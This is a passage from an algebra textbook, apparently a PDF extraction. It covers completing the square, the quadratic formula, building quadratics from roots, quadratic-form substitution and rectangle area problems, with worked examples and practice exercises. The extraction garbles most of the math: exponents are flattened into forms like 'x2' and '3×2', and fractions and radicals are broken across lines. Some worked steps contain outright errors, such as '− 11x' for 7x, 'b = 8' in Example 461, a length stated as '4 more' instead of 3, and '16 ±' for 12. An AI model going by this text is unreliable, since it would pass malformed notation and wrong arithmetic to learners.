=8\n\n(\n\n1\n\n2 · 8 )2\n\n= 42 = 16 The third term to complete the square is 16\n\nx2 + 8x + 16 Our equation as aperfect square, factor\n\n(x +4)2 Our Solution\n\nExample 460.\n\nx2− 7x + c c = (\n\n1\n\n2 · b )2\n\nand our b =7\n\n(\n\n1\n\n2 · 7 )2\n\n=\n\n(\n\n7\n\n2\n\n)2\n\n= 49\n\n4 The third term to complete the square is\n\n49\n\n4\n\nx2− 11x + 49 4\n\nOur equation as aperfect square, factor\n\n(\n\nx− 7 2\n\n)2\n\nOur Solution\n\nExample 461.\n\nx2 + 5\n\n3 x + c c =\n\n(\n\n1\n\n2 · b )2\n\nand our b =8\n\n(\n\n1\n\n2 · 5 3\n\n)2\n\n=\n\n(\n\n5\n\n6\n\n)2\n\n= 25\n\n36 The third term to complete the square is\n\n25\n\n36\n\n338\n\nx2 + 5\n\n3 x+\n\n25\n\n36 Our equation as aperfect square, factor\n\n(\n\nx + 5\n\n6\n\n)2\n\nOur Solution\n\nThe process in the previous examples, combined with the even root property, is used to solve quadratic equations by completing the square. The following five steps describe the process used to complete the square, along with an example to demonstrate each step.\n\nProblem 3×2 + 18x− 6=0\n\n1. Separate constant term from variables + 6+6\n\n3×2 + 18x = 6\n\n2. Divide each term by a 3\n\n3 x2 +\n\n18\n\n3 x =\n\n6\n\n3\n\nx2 +6x =2\n\n3. Find value to complete the square: (\n\n1\n\n2 · b )2 ( 1\n\n2 · 6 )2\n\n= 32 =9\n\n4. Add to both sides of equation x2 +6x =2\n\n+9 +9 x2 +6x + 9= 11\n\n5. Factor (x +3)2 = 11\n\nSolve by even root property\n\n(x +3)2 √\n\n=± 11 √\n\nx+ 3=± 11 √\n\n− 3 − 3 x=− 3± 11\n\nWorld View Note: The Chinese in 200 BC were the first known culture group to use a method similar to completing the square, but their method was only used to calculate positive roots.\n\nThe advantage of this method is it can be used to solve any quadratic equation. The following examples show how completing the square can give us rational solu- tions, irrational solutions, and even complex solutions.\n\nExample 462.\n\n2×2 + 20x+ 48= 0 Separate constant term fromvaraibles\n\n339\n\n− 48− 48 Subtract 24 2×2 + 20x =− 48 Divide by a or 2\n\n2 2 2\n\nx2 + 10x =− 24 Find number to complete the square: (\n\n1\n\n2 · b )2\n\n(\n\n1\n\n2 · 10 )2\n\n= 52 = 25 Add 25 to both sides of the equation\n\nx2 + 10x =− 24 + 25 + 25\n\nx2 + 10x+ 25= 1 Factor\n\n(x +5)2 = 1 Solvewith even root property\n\n(x +5)2 √\n\n=± 1 √\n\nSimplify roots\n\nx + 5=± 1 Subtract 5 fromboth sides − 5− 5\n\nx =− 5± 1 Evaluate x =− 4 or − 6 Our Solution\n\nExample 463.\n\nx2− 3x− 2=0 Separate constant fromvariables + 2+2 Add 2 to both sides\n\nx2− 3x =2 No a,find number to complete the square (\n\n1\n\n2 · b )2\n\n(\n\n1\n\n2 · 3 )2\n\n=\n\n(\n\n3\n\n2\n\n)2\n\n= 9\n\n9\n\n4 to both sides,\n\n2\n\n1\n\n(\n\n4\n\n4\n\n)\n\n+ 9\n\n4 =\n\n8\n\n4 +\n\n9\n\n4 =\n\n17\n\n4 Need commondenominator (4) on right\n\nx2− 3x + 9 4\n\n= 8\n\n4 +\n\n9\n\n4 =\n\n17\n\n4 Factor\n\n(\n\nx− 3 2\n\n)2\n\n= 17\n\n4 Solve using the even root property\n\n(\n\nx− 3 2\n\n)2 √\n\n=± 17 4\n\nSimplify roots\n\nx− 3 2\n\n= ± 17 √\n\n3\n\n2 to both sides,\n\n340\n\n+ 3\n\n2 +\n\n3\n\n2 we already have a common denominator\n\nx = 3± 17\n\n2 Our Solution\n\nExample 464.\n\n3×2 =2x− 7 Separate the constant from the variables − 2x− 2x Subtract 2x fromboth sides 3×2− 2x =− 7 Divide each termby a or 3 3 3 3\n\nx2− 2 3 x =− 7\n\n3 Find the number to complete the square\n\n(\n\n1\n\n2 · b )2\n\n(\n\n1\n\n2 · 2 3\n\n)2\n\n=\n\n(\n\n1\n\n3\n\n)2\n\n= 1\n\n− 7 3\n\n(\n\n3\n\n3\n\n)\n\n+ 1\n\n9 =\n\n− 21 3\n\n+ 1\n\n9 =\n\n− 20 9\n\nget commondenominator on right\n\nx2− 2 3 x+\n\n1\n\n3 =− 20\n\n9 Factor\n\n(\n\nx− 1 3\n\n)2\n\n=− 20 9\n\nSolve using the even root property\n\n(\n\nx− 1 3\n\n)2 √\n\n=± − 20 9\n\nSimplify roots\n\nx− 1 3\n\n= ± 2i 5\n\n1\n\n3 to both sides,\n\n+ 1\n\n3 +\n\n1\n\nx = 1± 2i 5\n\n3 Our Solution\n\nAs several of the examples have shown, when solving by completing the square we will often need to use fractions and be comfortable finding common denominators and adding fractions together. Once we get comfortable solving by completing the square and using the five steps, any quadratic equation can be easily solved.\n\n341\n\n9.3 Practice – Complete the Square\n\nFind the value that completes the square and then rewrite as a perfect square.\n\n1) x2− 30x +__ 3) m2− 36m +__ 5) x2− 15x + __ 7) y2− y +__\n\n2) a2− 24a +__ 4) x2− 34x +__ 6) r2− 1\n\n9 r +__\n\n8) p2− 17p +__ Solve each equation by completing the square.\n\n9) x2− 16x + 55=0 11) v2− 8v + 45= 0 13) 6×2 + 12x + 63= 0\n\n15) 5k2− 10k + 48=0 17) x2 + 10x− 57=4 19) n2− 16n + 67= 4 21) 2×2 + 4x + 38=− 6 23) 8b2 + 16b− 37=5 25) x2 =− 10x− 29 27) n2 =− 21+ 10n 29) 3k2 +9= 6k\n\n31) 2×2 + 63=8x\n\n33) p2− 8p =− 55 35) 7n2−n +7= 7n +6n2\n\n37) 13b2 + 15b + 44=− 5+7b2 +3b 39) 5×2 + 5x =− 31− 5x 41) v2 + 5v + 28=0\n\n43) 7×2− 6x + 40=0 45) k2− 7k + 50= 3 47) 5×2 + 8x− 40=8 49) m2 =− 15+9m 51) 8r2 + 10r =− 55 53) 5n2− 8n + 60=− 3n +6+ 4n2\n\n55) − 2×2 + 3x− 5=− 4×2\n\n10) n2− 8n− 12= 0 12) b2 + 2b+ 43= 0\n\n14) 3×2− 6x + 47=0 16) 8a2 + 16a− 1= 0 18) p2− 16p− 52= 0 20) m2− 8m− 3 =6 22) 6r2 + 12r − 24=− 6 24) 6n2− 12n− 14=4 26) v2 = 14v + 36\n\n28) a2− 56=− 10a 30) 5×2 =− 26+ 10x 32) 5n2 =− 10n + 15 34) x2 + 8x+ 15= 8\n\n36) n2 +4n = 12\n\n38) − 3r2 + 12r + 49=− 6r2\n\n40) 8n2 + 16n = 64\n\n42) b2 + 7b− 33=0 44) 4×2 + 4x + 25= 0\n\n46) a2− 5a + 25= 3 48) 2p2− p + 56=− 8 50) n2−n =− 41 52) 3×2− 11x =− 18 54) 4b2− 15b + 56=3b2\n\n56) 10v2− 15v = 27+ 4v2− 6v\n\n342\n\n9.4\n\nThe general from of a quadratic is ax2 + bx + c = 0. We will now solve this for- mula for x by completing the square\n\nExample 465.\n\nax2 + bc + c =0 Separate constant fromvariables\n\n− c− c Subtract c fromboth sides ax2 + bx =− c Divide each termby a a a a\n\nx2 + b\n\na x =\n\n− c a\n\nFind the number that completes the square (\n\n1\n\n2 · b a\n\n)2\n\n=\n\n(\n\nb\n\n2a\n\n)2\n\n= b2\n\nb2\n\n4a2 − c\n\na\n\n(\n\n4a\n\n4a\n\n)\n\n= b2\n\n4a2 − 4ac\n\n4a2 =\n\nb2− 4ac 4a2\n\nGet common denominator on right\n\nx2 + b\n\na x +\n\nb2\n\n4a2 =\n\nb2\n\n4a2 − 4ac\n\n4a2 =\n\nb2− 4ac 4a2\n\nFactor\n\n(\n\nx + b\n\n2a\n\n)2\n\n= b2− 4ac\n\n4a2 Solve using the even root property\n\n(\n\nx + b\n\n2a\n\n)2 √\n\n=± b 2− 4ac 4a2\n\nSimplify roots\n\nx + b\n\n2a =\n\n± b2− 4ac √\n\n2a Subtract\n\nb\n\n2a fromboth sides\n\nx = − b± b2− 4ac\n\n2a Our Solution\n\nThis solution is a very important one to us. As we solved a general equation by completing the square, we can use this formula to solve any quadratic equation. Once we identify what a, b, and c are in the quadratic, we can substitute those\n\n343\n\nvalues into x = − b± b2− 4ac\n\n2a and we will get our two solutions. This formula is\n\nQuadratic Formula: if ax2 + bx + c = 0 then x = − b ± b2 − 4ac\n\n2a\n\nWorld View Note: Indian mathematician Brahmagupta gave the first explicit formula for solving quadratics in 628. However, at that time mathematics was not done with variables and symbols, so the formula he gave was, “To the absolute number multiplied by four times the square, add the square of the middle term; the square root of the same, less the middle term, being divided by twice the square is the value.” This would translate to\n\n4ac+ b2 √\n\n− b 2a\n\nas the solution to the equation ax2 + bx = c.\n\nWe can use the quadratic formula to solve any quadratic, this is shown in the fol- lowing examples.\n\nExample 466.\n\nx2 +3x + 2=0 a= 1, b = 3, c =2, use quadratic formula\n\nx = − 3± 32− 4(1)(2)\n\n2(1) Evaluate exponent andmultiplication\n\nx = − 3± 9− 8\n\n2 Evaluate subtraction under root\n\nx = − 3± 1\n\n2 Evaluate root\n\nx = − 3± 1\n\n2 Evaluate± to get two answers\n\nx= − 2 2\n\nor − 4 2\n\nSimplify fractions\n\nx =− 1 or − 2 Our Solution\n\nAs we are solving using the quadratic formula, it is important to remember the equation must fist be equal to zero.\n\nExample 467.\n\n25×2 = 30x + 11 First set equal to zero\n\n− 30x− 11 − 30x− 11 Subtract 30x and 11 fromboth sides 25×2− 30x− 11=0 a= 25, b =− 30, c=− 11,use quadratic formula\n\nx = 30± (− 30)2− 4(25)(− 11)\n\n2(25) Evaluate exponent andmultiplication\n\n344\n\nx = 30± 900+ 1100\n\nx = 30± 2000\n\n50 Simplify root\n\nx = 30± 20 5\n\n50 Reduce fraction by dividing each termby 10\n\nx = 3± 2 5\n\n5 Our Solution\n\nExample 468.\n\n3×2 + 4x+ 8= 2×2 +6x− 5 First set equation equal to zero − 2×2− 6x+ 5 − 2×2− 6x + 5 Subtract 2×2 and 6x and add 5\n\nx2− 2x + 13=0 a =1, b =− 2, c= 13, use quadratic formula\n\nx = 2± (− 2)2− 4(1)(13)\n\n2(1) Evaluate exponent andmultiplication\n\nx = 2± 4− 52\n\n2 Evaluate subtraction inside root\n\nx = 2± − 48\n\n2 Simplify root\n\nx = 2± 4i 3\n\n2 Reduce fraction by dividing each termby 2\n\nx = 1± 2i 3 √\n\nOur Solution\n\nWhen we use the quadratic formula we don’t necessarily get two unique answers. We can end up with only one solution if the square root simplifies to zero.\n\nExample 469.\n\n4×2− 12x +9= 0 a = 4, b =− 12, c= 9,use quadratic formula\n\nx = 12± (− 12)2− 4(4)(9)\n\n2(4) Evaluate exponents andmultiplication\n\nx = 12± 144− 144\n\n8 Evaluate subtraction inside root\n\nx = 12± 0\n\n8 Evaluate root\n\nx = 12± 0\n\n8 Evaluate±\n\nx = 12\n\n8 Reduce fraction\n\nx= 3\n\n2 Our Solution\n\n345\n\nIf a term is missing from the quadratic, we can still solve with the quadratic for- mula, we simply use zero for that term. The order is important, so if the term with x is missing, we have b =0, if the constant term is missing, we have c= 0.\n\nExample 470.\n\n3×2 +7 =0 a = 3, b = 0(missing term), c =7\n\nx = − 0± 02− 4(3)(7)\n\n2(3) Evaluate exponnets andmultiplication, zeros not needed\n\nx = ± − 84 √\n\n6 Simplify root\n\nx = ± 2i 21\n\n6 Reduce,dividing by 2\n\nx = ± i 21\n\n3 Our Solution\n\nWe have covered three different methods to use to solve a quadratic: factoring, complete the square, and the quadratic formula. It is important to be familiar with all three as each has its advantage to solving quadratics. The following table walks through a suggested process to decide which method would be best to use for solving a problem.\n\n1. If it can easily factor, solve by factoring x2− 5x + 6=0 (x− 2)(x− 3) =0 x =2 or x = 3\n\n2. If a= 1 and b is even, complete the square\n\nx2 + 2x =4 (\n\n1\n\n2 · 2 )2\n\n= 12 =1\n\nx2 + 2x +1= 5 (x +1)2 = 5\n\nx +1 =± 5 √\n\nx =− 1± 5 √\n\n3. Otherwise, solve by the quadratic formula\n\nx2− 3x + 4=0 x =\n\n3± (− 3)2− 4(1)(4) √\n\n2(1)\n\nx = 3± i 7\n\n2\n\nThe above table is mearly a suggestion for deciding how to solve a quadtratic. Remember completing the square and quadratic formula will always work to solve any quadratic. Factoring only woks if the equation can be factored.\n\n346\n\nSolve each equation with the quadratic formula.\n\n1) 4a2 +6 =0\n\n3) 2×2− 8x− 2 =0\n\n5) 2m2− 3= 0\n\n7) 3r2− 2r − 1=0\n\n9) 4n2− 36= 0\n\n11) v2− 4v − 5=− 8\n\n13) 2a2 +3a + 14=6\n\n15) 3k2 +3k − 4= 7\n\n17) 7×2 + 3x− 16=− 2\n\n19) 2p2 + 6p− 16=4\n\n21) 3n2 +3n =− 3\n\n23) 2×2 =− 7x + 49\n\n25) 5×2 = 7x + 7\n\n27) 8n2 =− 3n− 8\n\n29) 2×2 + 5x =− 3\n\n31) 4a2− 64= 0\n\n33) 4p2 + 5p− 36=3p2\n\n35) − 5n2− 3n− 52= 2− 7n2\n\n37) 7r2− 12=− 3r\n\n39) 2n2− 9= 4\n\n2) 3k2 +2= 0\n\n4) 6n2− 1= 0\n\n6) 5p2 + 2p+ 6=0\n\n8) 2×2− 2x− 15= 0\n\n10) 3b2 + 6=0\n\n12) 2×2 + 4x + 12= 8\n\n14) 6n2− 3n +3=− 4\n\n16) 4×2− 14=− 2\n\n18) 4n2 +5n = 7\n\n20) m2 + 4m− 48=− 3\n\n22) 3b2− 3= 8b\n\n24) 3r2 + 4=− 6r\n\n26) 6a2 =− 5a + 13\n\n28) 6v2 = 4+ 6v\n\n30) x2 = 8\n\n32) 2k2 +6k − 16= 2k\n\n34) 12×2 +x + 7= 5×2 +5x\n\n36) 7m2− 6m + 6=−m\n\n38) 3×2− 3= x2\n\n40) 6b2 = b2 +7− b\n\n347\n\n9.5\n\nObjective: Find a quadratic equation that has given roots using reverse factoring and reverse completing the square.\n\nUp to this point we have found the solutions to quadratics by a method such as factoring or completing the square. Here we will take our solutions and work backwards to find what quadratic goes with the solutions.\n\nWe will start with rational solutions. If we have rational solutions we can use fac- toring in reverse, we will set each solution equal to x and then make the equation equal to zero by adding or subtracting. Once we have done this our expressions will become the factors of the quadratic.\n\nExample 471.\n\nThe solutions are 4 and− 2 Set each solution equal to x x =4 or x =− 2 Make each equation equal zero\n\n− 4− 4 +2 + 2 Subtract 4 fromfirst, add 2 to second x− 4= 0 or x + 2= 0 These expressions are the factors\n\n(x− 4)(x + 2)= 0 FOIL x2 +2x− 4x− 8 Combine like terms x2− 2x− 8= 0 Our Solution\n\nIf one or both of the solutions are fractions we will clear the fractions by multi- plying by the denominators.\n\nExample 472.\n\nThe solution are 2\n\n3 and\n\n3\n\n4 Set each solution equal tox\n\nx = 2\n\n3 or x =\n\n3\n\n4 Clear fractions bymultiplying by denominators\n\n3x =2 or 4x =3 Make each equation equal zero\n\n− 2− 2 − 3− 3 Subtract 2 from the first, subtract 3 from the second 3x− 2= 0 or 4x− 3=0 These expressions are the factors\n\n(3x− 2)(4x− 3) =0 FOIL 12×2− 9x− 8x + 6=0 Combine like terms\n\n348\n\n12×2− 17x + 6=0 Our Solution\n\nIf the solutions have radicals (or complex numbers) then we cannot use reverse factoring. In these cases we will use reverse completing the square. When there are radicals the solutions will always come in pairs, one with a plus, one with a minus, that can be combined into “one” solution using ± . We will then set this solution equal to x and square both sides. This will clear the radical from our problem.\n\nExample 473.\n\nThe solutions are 3 √\n\nand− 3 √\n\nWrite as ′′one′′ expression equal tox\n\nx =± 3 √\n\nSquare both sides\n\nx2 =3 Make equal to zero\n\n− 3− 3 Subtract 3 fromboth sides x2− 3=0 Our Solution\n\nWe may have to isolate the term with the square root (with plus or minus) by adding or subtracting. With these problems, remember to square a binomial we use the formula (a + b)2 = a2 + 2ab + b2\n\nExample 474.\n\nThe solutions are 2− 5 2 √\n\nand 2+ 5 2 √\n\nWrite as ′′one′′ expression equal tox\n\nx =2± 5 2 √\n\nIsolate the square root term\n\n− 2− 2 Subtract 2 fromboth sides x− 2=± 5 2\n\n√ Square both sides\n\nx2− 4x+ 4= 25 · 2 x2− 4x +4 = 50 Make equal to zero\n\n− 50− 50 Subtract 50 x2− 4x− 46= 0 Our Solution\n\nWorld View Note: Before the quadratic formula, before completing the square, before factoring, quadratics were solved geometrically by the Greeks as early as 300 BC! In 1079 Omar Khayyam, a Persian mathematician solved cubic equations geometrically!\n\nIf the solution is a fraction we will clear it just as before by multiplying by the denominator.\n\n349\n\nExample 475.\n\nThe solutions are 2 + 3\n\n4 and\n\n2− 3 √\n\n4 Write as ′′one′′ expresion equal tox\n\nx = 2± 3\n\n4 Clear fraction bymultiplying by 4\n\n4x = 2± 3 √\n\nIsolate the square root term\n\n− 2− 2 Subtract 2 fromboth sides 4x− 2=± 3\n\n√ Square both sides\n\n16×2− 16x + 4=3 Make equal to zero − 3− 3 Subtract 3\n\n16×2− 16x + 1=0 Our Solution\n\nThe process used for complex solutions is identical to the process used for radi- cals.\n\nExample 476.\n\nThe solutions are 4− 5i and 4+ 5i Write as ′′one′′ expression equal tox x =4± 5i Isolate the i term\n\n− 4− 4 Subtract 4 fromboth sides x− 4=± 5i Square both sides\n\nx2− 8x + 16= 25i2 i2 =− 1 x2− 8x + 16=− 25 Make equal to zero\n\n+ 25 + 25 Add 25 to both sides\n\nx2− 8x + 41=0 Our Solution\n\nExample 477.\n\nThe solutions are 3− 5i\n\n2 and\n\n3+ 5i\n\n2 Write as ′′one′′ expression equal to x\n\nx = 3± 5i\n\n2 Clear fraction bymultiplying by denominator\n\n2x =3± 5i Isolate the i term − 3− 3 Subtract 3 fromboth sides\n\n2x− 3=± 5i Square both sides 4×2− 12x + 9=5i2 i2 =− 1\n\n4×2− 12x +9 =− 25 Make equal to zero + 25 + 25 Add 25 to both sides\n\n4×2− 12x + 34=0 Our Solution\n\n350\n\n9.5 Practice – Build Quadratics from Roots\n\nFrom each problem, find a quadratic equation with those numbers as its solutions.\n\n1) 2, 5\n\n3) 20, 2\n\n5) 4, 4\n\n7) 0, 0\n\n9) − 4, 11\n\n11) 3\n\n4 ,\n\n1\n\n4\n\n13) 1\n\n2 ,\n\n1\n\n3\n\n15) 3\n\n7 , 4\n\n17) − 1 3 ,\n\n5\n\n6\n\n19) − 6, 1 9\n\n21) ± 5\n\n23) ± 1 5\n\n25) ± 11 √\n\n27) ± 3 √\n\n4\n\n29) ± i 13 √\n\n31) 2± 6 √\n\n33) 1± 3i\n\n35) 6± i 3 √\n\n37) − 1± 6\n\n2\n\n39) 6± i 2\n\n8\n\n2) 3, 6\n\n4) 13, 1\n\n6) 0, 9\n\n8) − 2,− 5\n\n10) 3, − 1\n\n12) 5\n\n8 ,\n\n5\n\n7\n\n14) 1\n\n2 ,\n\n2\n\n3\n\n16) 2, 2\n\n9\n\n18) 5\n\n3 ,− 1\n\n2\n\n20) − 2 5 , 0\n\n22) ± 1\n\n24) ± 7 √\n\n26) ± 2 3 √\n\n28) ± 11i\n\n30) ± 5i 2 √\n\n32) − 3± 2 √\n\n34) − 2± 4i\n\n36) − 9± i 5 √\n\n38) 2± 5i\n\n3\n\n40) − 2± i 15\n\n2\n\n351\n\n9.6\n\nObjective: Solve equations that are quadratic in form by substitution to create a quadratic equation.\n\nWe have seen three different ways to solve quadratics: factoring, completing the square, and the quadratic formula. A quadratic is any equation of the form 0 = ax2 + bx + c, however, we can use the skills learned to solve quadratics to solve problems with higher (or sometimes lower) powers if the equation is in what is called quadratic form.\n\nQuadratic Form: 0 = axm+ bxn + cwherem = 2n\n\nAn equation is in quadratic form if one of the exponents on a variable is double the exponent on the same variable somewhere else in the equation. If this is the case we can create a new variable, set it equal to the variable with smallest expo- nent. When we substitute this into the equation we will have a quadratic equa- tion we can solve.\n\nWorld View Note: Arab mathematicians around the year 1000 were the first to use this method!\n\nExample 478.\n\nx4− 13×2 + 36=0 Quadratic form, one exponent, 4, double the other, 2 y =x2 Newvariableequaltothevariablewithsmallerexponent\n\ny2 =x4 Square both sides\n\ny2− 13y + 36=0 Substitute y forx2 and y2 for x4 (y − 9)(y − 4)=0 Solve.Wecan solve this equation by factoring\n\ny − 9 =0 or y − 4=0 Set each factor equal to zero +9 +9 + 4+4 Solve each equation\n\ny = 9 or y =4 Solutions for y,needx.Wewill use y =x2 equation\n\n9= x2 or 4=x2 Substitute values for y\n\n± 9 √\n\n= x2 √\n\nor ± 4 √\n\n= x2 √\n\nSolve using the even root property, simplify roots\n\nx =± 3,± 2 Our Solutions\n\nWhen we have higher powers of our variable, we could end up with many more solutions. The previous equation had four unique solutions.\n\n352\n\nExample 479.\n\na−2− a−1− 6=0 Quadratic form, one exponent,− 2, is double the other,− 1 b = a−1 Makeanewvariableequaltothevariablewith lowestexponent\n\nb2 = a−2 Square both sides\n\nb2− b− 6=0 Substitute b2 for a−2 and b for a−1 (b− 3)(b +2) =0 Solve.Wewill solve by factoring\n\nb− 3=0 or b + 2=0 Set each factor equal to zero +3 +3 − 2− 2 Solve each equation\n\nb= 3 or b =− 2 Solutions for b, still need a, substitute into b = a−1 3 = a−1 or − 2= a−1 Raise both sides to− 1power\n\n3−1 = a or (− 2)−1 = a Simplify negative exponents a=\n\n1\n\n3 ,− 1\n\n2 Our Solution\n\nJust as with regular quadratics, these problems will not always have rational solu- tions. We also can have irrational or complex solutions to our equations.\n\nExample 480.\n\n2×4 +x2 =6 Make equation equal to zero\n\n− 6− 6 Subtract 6 fromboth sides 2×4 +x2− 6 =0 Quadratic form, one exponent, 4,double the other, 2\n\ny =x2 Newvariableequalvariablewithsmallestexponent\n\ny2 =x4 Square both sides\n\n2y2 + y − 6 =0 Solve.Wewill factor this equation (2y − 3)(y +2) =0 Set each factor equal to zero\n\n2y − 3= 0 or y +2 =0 Solve each equation + 3+ 3 − 2− 2\n\n2y =3 or y =− 2 2 2\n\ny = 3\n\n2 or y =− 2 Wehave y, still need x. Substitute into y =x2\n\n3\n\n2 =x2 or − 2 =x2 Square root of each side\n\n± 3 2\n\n= x2 √\n\nor ± − 2 √\n\n= x2 √\n\nSimplify each root, rationalize denominator\n\nx = ± 6 √\n\n2 ,± i 2\n\n√ Our Solution\n\n353\n\nWhen we create a new variable for our substitution, it won’t always be equal to just another variable. We can make our substitution variable equal to an expres- sion as shown in the next example.\n\nExample 481.\n\n3(x− 7)2− 2(x− 7)+ 5=0 Quadratic form y =x− 7 Define newvariable\n\ny2 = (x− 7)2 Square both sides 3y2− 2y + 5=0 Substitute values into original\n\n(3y − 5)(y +1) =0 Factor 3y − 5= 0 or y + 1=0 Set each factor equal to zero\n\n+5+ 5 − 1− 1 Solve each equation 3y =5 or y =− 1 3 3\n\ny = 5\n\n3 or y =− 1 Wehave y,we still needx.\n\n5\n\n3 =x− 7 or − 1 =x− 7 Substitute into y =x− 7\n\n+ 21\n\n3 +7 +7 +7 Add 7.Use common denominator as needed\n\nx = 26\n\n3 , 6 Our Solution\n\nExample 482.\n\n(x2− 6x)2 =7(x2− 6x)− 12 Make equation equal zero − 7(x2− 6x)+ 12− 7(x2− 6x) + 12 Move all terms to left\n\n(x2− 6x)2− 7(x2− 6x) + 12= 0 Quadratic form y = x2− 6x Make newvariable\n\ny2 =(x2− 6x)2 Square both sides y2− 7y + 12= 0 Substitute into original equation\n\n(y − 3)(y − 4)= 0 Solve by factoring y − 3= 0 or y − 4= 0 Set each factor equal to zero\n\n+3+ 3 +4+ 4 Solve each equation\n\ny =3 or y =4 Wehave y, still needx.\n\n3 =x2− 6x or 4= x3− 6x Solve each equation, complete the square (\n\n1\n\n2 · 6 )2\n\n= 32 = 9 Add 9 to both sides of each equation\n\n12= x2− 6x + 9 or 13=x2− 6x+ 9 Factor\n\n354\n\n12= (x− 3)2 or 13=(x− 3)2 Use even root property ± 12 √\n\n= (x− 3)2 √\n\nor ± 13 √\n\n= (x− 3)2 √\n\nSimplify roots\n\n± 2 3 √\n\n= x− 3 or ± 13 √\n\n= x− 3 Add 3 to both sides +3 +3 + 3 + 3\n\nx = 3± 2 3 √\n\n, 3± 13 √\n\nOur Solution\n\nThe higher the exponent, the more solution we could have. This is illustrated in the following example, one with six solutions.\n\nExample 483.\n\nx6− 9×3 + 8= 0 Quadratic form, one exponent, 6,double the other, 3 y =x3 Newvariableequaltovariablewithlowestexponent\n\ny2 =x6 Square both sides\n\ny2− 9y + 8= 0 Substitute y2 forx6 and y for x3 (y − 1)(y − 8)= 0 Solve.Wewill solve by factoring.\n\ny − 1=0 or y − 8= 0 Set each factor equal to zero +1 +1 + 8+ 8 Solve each equation\n\ny = 1 or y = 8 Solutions for y,we need x.Substitute into y = x3\n\nx3 = 1 or x3 = 8 Set each equation equal to zero\n\n− 1− 1 − 8− 8 x3− 1=0 or x3− 8= 0 Factor each equation,difference of cubes (x− 1)(x2 + x +1)= 0 Firstequation factored.Seteachfactorequaltozero\n\nx− 1= 0 or x2 +x + 1= 0 First equation is easy to solve + 1+ 1\n\nx = 1 First solution\n\n− 1± 12− 4(1)(1) √\n\n2(1) =\n\n1± i 3 √\n\n2 Quadratic formula on second factor\n\n(x− 2)(x2 +2x + 4)= 0 Factor the seconddifference of cubes x− 2= 0 or x2 +2x + 4= 0 Set each factor equal to zero.\n\n+2+ 2 First equation is easy to solve\n\nx =2 Our fourth solution\n\n− 2± 22− 4(1)(4) √\n\n2(1) =− 1± i 3\n\n√ Quadratic formula on second factor\n\nx = 1, 2, 1± i 3\n\n2 ,− 1± i 3\n\n√ Our final six solutions\n\n355\n\n9.6 Practice – Quadratic in Form\n\nSolve each of the following equations. Some equations will have complex roots.\n\n1) x4− 5×2 +4= 0\n\n3) m4− 7m2− 8=0\n\n5) a4− 50a2 + 49=0\n\n7) x4− 25×2 + 144= 0\n\n9) m4− 20m2 + 64= 0\n\n11) z6− 216= 19z3\n\n13) 6z4− z2 = 12\n\n15) x 2\n\n3 − 35=2x 1\n\n3\n\n17) y−6 + 7y−3 =8\n\n19) x4− 2×2− 3=0\n\n21) 2×4− 5×2 + 2= 0\n\n23) x4− 9×2 +8= 0\n\n25) 8×6− 9×3 + 1= 0\n\n27) x8− 17×4 + 16= 0\n\n29) (y + b)2− 4(y + b)= 21\n\n31) (y + 2)2− 6(y + 2)= 16\n\n33) (x− 3)2− 2(x− 3)= 35\n\n35) (r − 1)2− 8(r − 1) = 20\n\n37) 3(y + 1)2− 14(y + 1) =5\n\n39) (3×2− 2x)2 +5= 6(3×2− 2x)\n\n41) 2(3x +1) 2\n\n3 − 5(3x + 1) 1\n\n3 = 88\n\n43) (x2 + 2x)2− 2(x2 +2x)= 3\n\n45) (2×2−x)2− 4(2×2−x)+ 3=0\n\n2) y4− 9y2 + 20= 0\n\n4) y4− 29y2 + 100= 0\n\n6) b4− 10b2 + 9= 0\n\n8) y4− 40y2 + 144= 0\n\n10) x6− 35×3 + 216= 0\n\n12) y4− 2y2 = 24\n\n14) x−2−x−1− 12= 0\n\n16) 5y−2− 20= 21y−1\n\n18) x4− 7×2 + 12= 0\n\n20) x4 + 7×2 + 10=0\n\n22) 2×4−x2− 3=0\n\n24) x6− 10×3 + 16= 0\n\n26) 8×6 + 7×3− 1= 0\n\n28) (x− 1)2− 4(x− 1)= 5\n\n30) (x +1)2 +6(x + 1)+ 9=0\n\n32) (m− 1)2− 5(m− 1)= 14\n\n34) (a +1)2 +2(a− 1)= 15\n\n36) 2(x− 1)2− (x− 1)= 3\n\n38) (x2− 3)2− 2(x2− 3)=3\n\n40) (x2 + x +3)2 + 15=8(x2 + x +3)\n\n42) (x2 + x)2− 8(x2 +x)+ 12=0\n\n44) (2×2 + 3x)2 =8(2×2 +3x)+ 9\n\n46) (3×2− 4x)2 =3(3×2− 4x) + 4\n\n356\n\n9.7\n\nObjective: Solve applications of quadratic equations using rectangles.\n\nAn application of solving quadratic equations comes from the formula for the area of a rectangle. The area of a rectangle can be calculated by multiplying the width by the length. To solve problems with rectangles we will first draw a picture to represent the problem and use the picture to set up our equation.\n\nExample 484.\n\nThe length of a rectangle is 3 more than the width. If the area is 40 square inches, what are the dimensions?\n\n40 x Wedonot know thewidth, x.\n\nx +3 Length is 4more, orx +4, and area is 40.\n\n357\n\nx(x + 3)= 40 Multiply length bywidth to get area\n\nx2 +3x = 40 Distribute\n\n− 40− 40 Make equation equal zero x2 + 3x− 40=0 Factor\n\n(x− 5)(x + 8)=0 Set each factor equal to zero x− 5=0 or x + 8=0 Solve each equation +5+ 5 − 8− 8\n\nx =5 or x =− 8 Our x is awidth, cannot be negative. (5)+ 3=8 Length isx +3, substitute 5 for x to find length\n\n5 in by 8 in Our Solution\n\nThe above rectangle problem is very simple as there is only one rectangle involved. When we compare two rectangles, we may have to get a bit more cre- ative.\n\nExample 485.\n\nIf each side of a square is increased by 6, the area is multiplied by 16. Find the side of the original square.\n\nx2 x Square has all sides the same length\n\nx Area is found bymultiplying length bywidth\n\n16×2 x +6 Each side is increased by 6,\n\nx +6 Area is 16 times original area\n\n(x + 6)(x +6) = 16×2 Multiply length bywidth to get area\n\nx2 + 12x + 36= 16×2 FOIL\n\n− 16×2 − 16×2 Make equation equal zero − 15×2 + 12x + 36=0 Divide each termby− 1, changes the signs 15×2− 12x− 36=0 Solve using the quadratic formula\n\nx= 12± (− 12)2− 4(15)(− 36)\n\n2(15) Evaluate\n\nx = 16± 2304\n\n30\n\nx = 16± 48\n\n30 Can ′thave anegative solution,wewill only add\n\nx = 60\n\n30 =2 Ourx is the original square\n\n358\n\n2 Our Solution\n\nExample 486.\n\nThe length of a rectangle is 4 ft greater than the width. If each dimension is increased by 3, the new area will be 33 square feet larger. Find the dimensions of the original rectangle.\n\nx(x +4) x Wedon ′t knowwidth, x, length is 4more, x +4\n\nx +4 Area is foundbymultiplying length bywidth\n\nx(x +4)+ 33 x +3 Increase each side by 3. width becomesx + 3, length x + 4+3 